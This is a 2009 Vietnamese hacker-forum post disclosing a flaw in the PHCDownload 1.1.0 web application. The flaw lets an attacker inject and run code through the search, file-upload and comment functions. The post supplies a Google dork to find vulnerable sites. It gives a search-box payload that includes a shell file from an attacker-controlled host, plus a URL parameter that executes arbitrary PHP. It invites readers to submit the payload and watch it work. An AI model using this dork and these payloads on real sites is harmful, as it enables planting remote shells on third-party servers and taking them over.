banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits PHCDownload 1.1.0 by H2P  XML
  [Discussion]   PHCDownload 1.1.0 by H2P 25/02/2009 19:07:56 (+0700) | #1 | 170872
hack2prison
Member

[Minus]    0    [Plus]
Joined: 10/02/2004 10:43:43
Messages: 58
Offline
[Profile] [PM]
Mô tả:
- Script: PHCDownload là mã nguồn ứng dụng web dùng để quản lý upload/download rất hay nhưng điểm yếu muôn thuở của các code cho phép upload là tạo điều kiện cho attacker cài ám khí lên server.
- Vendor: http://phpcredo.com
- Menthod: Remote File Inclusion.
- Infect: search, addfile và add comment function.
- Version: v1.1.0 and older
- Reported: H2P
Khai thác:
- Google dork: Powered by PHCDownload 1.1.0
- http://[insecure_site]/[path]/search.php
Search Words: ">< <?php include("[http://attacker_site]/[shell_file]"); ?>
Submit và xem điều kỳ diệu.

Note: Tương tự đối với chức năng add file và post comment
Bạn có thể chạy mã PHP: http://[insecure_site]/[path]/search.php?string=">< <?php PHP_CODE_HERE ?>
Cái này hơi lạ, giống Remote File Inclusion nhưng còn có thể chèn và chạy trực tiếp mã PHP.
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|